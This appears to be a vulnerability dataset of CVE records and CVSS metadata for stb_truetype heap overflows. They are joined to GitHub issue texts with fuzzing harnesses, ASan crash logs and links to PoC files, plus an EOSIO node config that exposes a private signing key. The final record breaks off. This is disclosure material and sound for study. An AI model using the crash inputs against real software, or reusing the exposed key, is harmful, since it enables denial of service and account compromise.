confirmed: 0] info 2021-10-19T05:30:58.901 nodeos producer_plugin.cpp:2333 produce_block ] Produced block 473c9b09d2c56f34... #64 @ 2021-10-19T05:30:59.000 signed by eosio [trxs: 0, lib: 63, confirmed: 0] info 2021-10-19T05:30:59.301 nodeos producer_plugin.cpp:2333 produce_block ] Produced block 91d3cccbd891aeac... #65 @ 2021-10-19T05:30:59.500 signed by eosio [trxs: 0, lib: 64, confirmed: 0] info 2021-10-19T05:30:59.902 nodeos producer_plugin.cpp:2333 produce_block ] Produced block ed28d25ae2dd6758... #66 @ 2021-10-19T05:31:00.000 signed by eosio [trxs: 0, lib: 65, confirmed: 0] info 2021-10-19T05:31:00.401 nodeos producer_plugin.cpp:2333 produce_block ] Produced block 6ba3e5c44047d20e... #67 @ 2021-10-19T05:31:00.500 signed by eosio [trxs: 0, lib: 66, confirmed: 0] info 2021-10-19T05:31:00.901 nodeos producer_plugin.cpp:2333 produce_block ] Produced block 4f3357d2c3d89b81... #68 @ 2021-10-19T05:31:01.000 signed by eosio [trxs: 0, lib: 67, confirmed: 0] info 2021-10-19T05:31:01.401 nodeos producer_plugin.cpp:2333 produce_block ] Produced block 9eab505535c4df89... #69 @ 2021-10-19T05:31:01.500 signed by eosio [trxs: 0, lib: 68, confirmed: 0] info 2021-10-19T05:31:01.538 nodeos txn_test_gen_plugin.cp:132 create_test_accounts ] create_test_accounts ================================================================= ==108558==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100005ee7c at pc 0x00000058d049 bp 0x7ffdf793a540 sp 0x7ffdf7939ce8 READ of size 4477 at 0x62100005ee7c thread T0 #0 0x58d048 in strlen (/root/eos-2.1.0/eos/build/bin/nodeos+0x58d048) #1 0x668bcd in std::char_traits<char>::length(char const*) /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/char_traits.h:335:9 #2 0x668bcd in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::basic_string<std::allocator<char> >(char const*, std::allocator<char> const&) /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/basic_string.h:527 #3 0x15cf35c in eosio::txn_test_gen_plugin_impl::create_test_accounts(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::function<void (std::shared_ptr<fc::exception> const&)> const&) /root/eos-2.1.0/eos/plugins/txn_test_gen_plugin/txn_test_gen_plugin.cpp:139:59 #4 0x15b5962 in eosio::txn_test_gen_plugin::plugin_startup()::$_0::operator()(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::function<void (int, std::optional<fc::variant>)>) /root/eos-2.1.0/eos/plugins/txn_test_gen_plugin/txn_test_gen_plugin.cpp:457:7 #5 0x15b5962 in std::_Function_handler<void (std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::function<void (int, std::optional<fc::variant>)>), eosio::txn_test_gen_plugin::plugin_startup()::$_0>::_M_invoke(std::_Any_data const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&&, std::function<void (int, std::optional<fc::variant>)>&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/std_function.h:300 #6 0x214cb88 in std::function<void (std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::function<void (int, std::optional<fc::variant>)>)>::operator()(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::function<void (int, std::optional<fc::variant>)>) const /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/std_function.h:688:14 #7 0x214cb88 in eosio::http_plugin_impl::make_app_thread_url_handler(int, std::function<void (std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::function<void (int, std::optional<fc::variant>)>)>, std::shared_ptr<eosio::http_plugin_impl>)::'lambda'(std::shared_ptr<eosio::detail::abstract_conn>, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::function<void (int, std::optional<fc::variant>)>)::operator()(std::shared_ptr<eosio::detail::abstract_conn>, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::function<void (int, std::optional<fc::variant>)>) const::'lambda'()::operator()() /root/eos-2.1.0/eos/plugins/http_plugin/http_plugin.cpp:554 #8 0x6af84e in appbase::execution_priority_queue::execute_highest() /root/eos-2.1.0/eos/libraries/appbase/include/appbase/execution_priority_queue.hpp:42:27 #9 0x692435 in appbase::application::exec() /root/eos-2.1.0/eos/libraries/appbase/application.cpp:423:27 #10 0x65d736 in main /root/eos-2.1.0/eos/programs/nodeos/main.cpp:143:13 #11 0x7fa8fe77e0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #12 0x579bfd in _start (/root/eos-2.1.0/eos/build/bin/nodeos+0x579bfd) 0x62100005ee7c is located 0 bytes to the right of 4476-byte region [0x62100005dd00,0x62100005ee7c) allocated by thread T0 here: #0 0x650c82 in operator new(unsigned long) (/root/eos-2.1.0/eos/build/bin/nodeos+0x650c82) #1 0x7519de in __gnu_cxx::new_allocator<char>::allocate(unsigned long, void const*) /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/ext/new_allocator.h:114:27 #2 0x7519de in std::allocator_traits<std::allocator<char> >::allocate(std::allocator<char>&, unsigned long) /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/alloc_traits.h:444 #3 0x7519de in std::_Vector_base<char, std::allocator<char> >::_M_allocate(unsigned long) /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/stl_vector.h:343 #4 0x15cf2b0 in eosio::txn_test_gen_plugin_impl::create_test_accounts(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::function<void (std::shared_ptr<fc::exception> const&)> const&) /root/eos-2.1.0/eos/plugins/txn_test_gen_plugin/txn_test_gen_plugin.cpp:139:59 #5 0x15b5962 in eosio::txn_test_gen_plugin::plugin_startup()::$_0::operator()(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::function<void (int, std::optional<fc::variant>)>) /root/eos-2.1.0/eos/plugins/txn_test_gen_plugin/txn_test_gen_plugin.cpp:457:7 #6 0x15b5962 in std::_Function_handler<void (std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::function<void (int, std::optional<fc::variant>)>), eosio::txn_test_gen_plugin::plugin_startup()::$_0>::_M_invoke(std::_Any_data const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&&, std::function<void (int, std::optional<fc::variant>)>&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/std_function.h:300 #7 0x214cb88 in std::function<void (std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::function<void (int, std::optional<fc::variant>)>)>::operator()(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::function<void (int, std::optional<fc::variant>)>) const /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/std_function.h:688:14 #8 0x214cb88 in eosio::http_plugin_impl::make_app_thread_url_handler(int, std::function<void (std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::function<void (int, std::optional<fc::variant>)>)>, std::shared_ptr<eosio::http_plugin_impl>)::'lambda'(std::shared_ptr<eosio::detail::abstract_conn>, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::function<void (int, std::optional<fc::variant>)>)::operator()(std::shared_ptr<eosio::detail::abstract_conn>, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::function<void (int, std::optional<fc::variant>)>) const::'lambda'()::operator()() /root/eos-2.1.0/eos/plugins/http_plugin/http_plugin.cpp:554 #9 0x6af84e in appbase::execution_priority_queue::execute_highest() /root/eos-2.1.0/eos/libraries/appbase/include/appbase/execution_priority_queue.hpp:42:27 #10 0x65d736 in main /root/eos-2.1.0/eos/programs/nodeos/main.cpp:143:13 #11 0x7fa8fe77e0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow (/root/eos-2.1.0/eos/build/bin/nodeos+0x58d048) in strlen Shadow bytes around the buggy address: 0x0c4280003d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4280003d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4280003d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4280003da0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4280003db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c4280003dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[04] 0x0c4280003dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280003de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280003df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280003e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280003e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==108558==ABORTING ``` - The config.ini file of eosio node (producer): ``` http-server-address = 0.0.0.0:8888 p2p-listen-endpoint = 0.0.0.0:9800 allowed-connection = any p2p-max-nodes-per-host = 100 signature-provider = EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV=KEY:5KQwrPbwdL6PhXujxW37FSSQZ1JiwsST4cqQzDeyXtP79zkvFD3 producer-name = eosio plugin = eosio::http_plugin plugin = eosio::chain_api_plugin plugin = eosio::producer_plugin plugin = eosio::producer_api_plugin plugin = eosio::net_api_plugin enable-stale-production = true plugin = eosio::txn_test_gen_plugin ``` - The config.ini file of non-producer node: ``` http-server-address = 0.0.0.0:8889 p2p-listen-endpoint = 0.0.0.0:9801 allowed-connection = any p2p-peer-address = localhost:9800 p2p-max-nodes-per-host = 100 signature-provider = public_key=KEY:private_key producer-name = bp.a plugin = eosio::http_plugin plugin = eosio::chain_api_plugin plugin = eosio::producer_plugin plugin = eosio::net_api_plugin plugin = eosio::history_api_plugin plugin = eosio::txn_test_gen_plugin ``` **Is there a bug, or which of my steps is wrong?** Waiting for any answer and solutions, thank you very much!
[heap-buffer-overflow] happens while using txn_test_gen_plugin
https://api.github.com/repos/EOSIO/eos/issues/10820/comments
3
2021-10-19T05:52:33Z
2021-10-27T17:46:20Z
https://github.com/EOSIO/eos/issues/10820
1,029,887,961
10,820
3,361
CVE-2022-25514
2022-03-17T01:15:06.977
stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function ttUSHORT() at stb_truetype.h. NOTE: Third party has disputed stating that the source code has also a disclaimer that it should only be used with trusted input.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1286" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1286" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_truetype.h:1.26:*:*:*:*:*:*:*", "matchCriteriaId": "0A85C59A-992C-40DA-B113-A0F5FF9C1A9B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/nothings/stb/issues/1286
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
**Describe** A heap-buffer-overflow was discovered in stb_truetype. The issue is being triggered in function ttUSHORT() at stb_truetype.h:1286 **To Reproduce** test program ``` #include <stdio.h> #include <stdlib.h> #define STB_IMAGE_WRITE_IMPLEMENTATION #include "stb_image_write.h" #define STB_TRUETYPE_IMPLEMENTATION #include "stb_truetype.h" int main(int argc, const char *argv[]) { long int size = 0; unsigned char *fontBuffer = NULL; FILE *fontFile = fopen(argv[1], "rb"); if (fontFile == NULL) { printf("Can not open font file!\n"); return 0; } fseek(fontFile, 0, SEEK_END); size = ftell(fontFile); fseek(fontFile, 0, SEEK_SET); fontBuffer = calloc(size, sizeof(unsigned char)); fread(fontBuffer, size, 1, fontFile); fclose(fontFile); stbtt_fontinfo info; if (!stbtt_InitFont(&info, fontBuffer, 0)) { printf("stb init font failed\n"); } int bitmap_w = 512; int bitmap_h = 128; free(fontBuffer); return 0; } ``` Compile test program with address sanitizer with this command: `AFL_HARDEN=1 afl-gcc -I /src/stb/include ttf.c -o ttf -lm` You can get program [here](https://github.com/Vincebye/Fuzzing/blob/main/Asanttf) **Asan Reports** `./Asanttf crash/0` Get ASan reports ```================================================================= ==3156==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63000000ebf0 at pc 0x55ba19faea04 bp 0x7ffc3b853000 sp 0x7ffc3b852ff0 READ of size 1 at 0x63000000ebf0 thread T0 #0 0x55ba19faea03 in ttUSHORT /src/stb/include/stb_truetype.h:1286 #1 0x55ba19faea03 in stbtt_InitFont_internal /src/stb/include/stb_truetype.h:1472 #2 0x55ba19faea03 in stbtt_InitFont /src/stb/include/stb_truetype.h:4954 #3 0x55ba19fb01fc in main /src/stb/ttf.c:32 #4 0x7f443d2b80b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #5 0x55ba19f8970d in _start (/src/stb/Asanttf+0x470d) 0x63000000ebf0 is located 1 bytes to the right of 59375-byte region [0x630000000400,0x63000000ebef) allocated by thread T0 here: #0 0x7f443d686e17 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154 #1 0x55ba19fb01c6 in main /src/stb/ttf.c:26 #2 0x7f443d2b80b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow /src/stb/include/stb_truetype.h:1286 in ttUSHORT Shadow bytes around the buggy address: 0x0c607fff9d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c607fff9d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c607fff9d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c607fff9d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c607fff9d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c607fff9d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 07[fa]fa 0x0c607fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3156==ABORTING ``` **Poc** Poc file is [here](https://github.com/Vincebye/Fuzzing/blob/main/0)
heap-buffer-overflow in function ttUSHORT() at stb_truetype.h:1286
https://api.github.com/repos/nothings/stb/issues/1286/comments
1
2022-02-16T15:20:17Z
2022-02-17T06:54:48Z
https://github.com/nothings/stb/issues/1286
1,140,162,314
1,286
3,362
CVE-2022-25515
2022-03-17T01:15:07.020
stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function ttULONG() at stb_truetype.h. NOTE: Third party has disputed stating that the source code has also a disclaimer that it should only be used with trusted input.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1286" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1288" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1286" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1288" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_truetype.h:1.26:*:*:*:*:*:*:*", "matchCriteriaId": "0A85C59A-992C-40DA-B113-A0F5FF9C1A9B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/nothings/stb/issues/1288
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
**Describe** A heap-buffer-overflow was discovered in stb_truetype. The issue is being triggered in function ttLONG() at stb_truetype.h:1288 **To Reproduce** test program ``` #include <stdio.h> #include <stdlib.h> #define STB_IMAGE_WRITE_IMPLEMENTATION #include "stb_image_write.h" #define STB_TRUETYPE_IMPLEMENTATION #include "stb_truetype.h" int main(int argc, const char *argv[]) { long int size = 0; unsigned char *fontBuffer = NULL; FILE *fontFile = fopen(argv[1], "rb"); if (fontFile == NULL) { printf("Can not open font file!\n"); return 0; } fseek(fontFile, 0, SEEK_END); size = ftell(fontFile); fseek(fontFile, 0, SEEK_SET); fontBuffer = calloc(size, sizeof(unsigned char)); fread(fontBuffer, size, 1, fontFile); fclose(fontFile); stbtt_fontinfo info; if (!stbtt_InitFont(&info, fontBuffer, 0)) { printf("stb init font failed\n"); } int bitmap_w = 512; int bitmap_h = 128; free(fontBuffer); return 0; } ``` Compile test program with address sanitizer with this command: `AFL_HARDEN=1 afl-gcc -I /src/stb/include ttf.c -o ttf -lm` You can get program [here](https://github.com/Vincebye/Fuzzing/blob/main/Asanttf) **Asan Reports** `./Asanttf crash/45` Get ASan reports ```================================================================= ==3168==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x610000000104 at pc 0x55700d9d677b bp 0x7ffd59f491f0 sp 0x7ffd59f491e0 READ of size 1 at 0x610000000104 thread T0 #0 0x55700d9d677a in ttULONG /src/stb/include/stb_truetype.h:1288 #1 0x55700d9d6d05 in stbtt__find_table /src/stb/include/stb_truetype.h:1314 #2 0x55700d9f6e49 in stbtt_InitFont_internal /src/stb/include/stb_truetype.h:1393 #3 0x55700d9f6e49 in stbtt_InitFont /src/stb/include/stb_truetype.h:4954 #4 0x55700d9f91fc in main /src/stb/ttf.c:32 #5 0x7fd105b7e0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #6 0x55700d9d270d in _start (/src/stb/Asanttf+0x470d) 0x610000000104 is located 4 bytes to the right of 192-byte region [0x610000000040,0x610000000100) allocated by thread T0 here: #0 0x7fd105f4ce17 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154 #1 0x55700d9f91c6 in main /src/stb/ttf.c:26 #2 0x7fd105b7e0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow /src/stb/include/stb_truetype.h:1288 in ttULONG Shadow bytes around the buggy address: 0x0c207fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c207fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c207fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c207fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c207fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c207fff8020:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3168==ABORTING ``` **Poc** Poc file is [here](https://github.com/Vincebye/Fuzzing/blob/main/45)
heap-buffer-overflow in function ttULONG() at stb_truetype.h:1288
https://api.github.com/repos/nothings/stb/issues/1288/comments
1
2022-02-16T15:32:13Z
2022-02-17T06:55:53Z
https://github.com/nothings/stb/issues/1288
1,140,194,570
1,288
3,363
CVE-2022-25516
2022-03-17T01:15:07.063
stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function stbtt__find_table at stb_truetype.h. NOTE: Third party has disputed stating that the source code has also a disclaimer that it should only be used with trusted input.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1286" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1287" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1286" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1287" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_truetype.h:1.26:*:*:*:*:*:*:*", "matchCriteriaId": "0A85C59A-992C-40DA-B113-A0F5FF9C1A9B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/nothings/stb/issues/1287
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
**Describe** A heap-buffer-overflow was discovered in stb_truetype. The issue is being triggered in function stbtt__find_table () at stb_truetype.h:1313 **To Reproduce** test program ``` #include <stdio.h> #include <stdlib.h> #define STB_IMAGE_WRITE_IMPLEMENTATION #include "stb_image_write.h" #define STB_TRUETYPE_IMPLEMENTATION #include "stb_truetype.h" int main(int argc, const char *argv[]) { long int size = 0; unsigned char *fontBuffer = NULL; FILE *fontFile = fopen(argv[1], "rb"); if (fontFile == NULL) { printf("Can not open font file!\n"); return 0; } fseek(fontFile, 0, SEEK_END); size = ftell(fontFile); fseek(fontFile, 0, SEEK_SET); fontBuffer = calloc(size, sizeof(unsigned char)); fread(fontBuffer, size, 1, fontFile); fclose(fontFile); stbtt_fontinfo info; if (!stbtt_InitFont(&info, fontBuffer, 0)) { printf("stb init font failed\n"); } int bitmap_w = 512; int bitmap_h = 128; free(fontBuffer); return 0; } ``` Compile test program with address sanitizer with this command: `AFL_HARDEN=1 afl-gcc -I /src/stb/include ttf.c -o ttf -lm` You can get program [here](https://github.com/Vincebye/Fuzzing/blob/main/Asanttf) **Asan Reports** `./Asanttf crash/10` Get ASan reports ```================================================================= ==3164==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60f0000000fc at pc 0x561fa86e2c28 bp 0x7ffd44ebe720 sp 0x7ffd44ebe710 READ of size 1 at 0x60f0000000fc thread T0 #0 0x561fa86e2c27 in stbtt__find_table /src/stb/include/stb_truetype.h:1313 #1 0x561fa8702e31 in stbtt_InitFont_internal /src/stb/include/stb_truetype.h:1392 #2 0x561fa8702e31 in stbtt_InitFont /src/stb/include/stb_truetype.h:4954 #3 0x561fa87051fc in main /src/stb/ttf.c:32 #4 0x7f613bb2c0b2 in 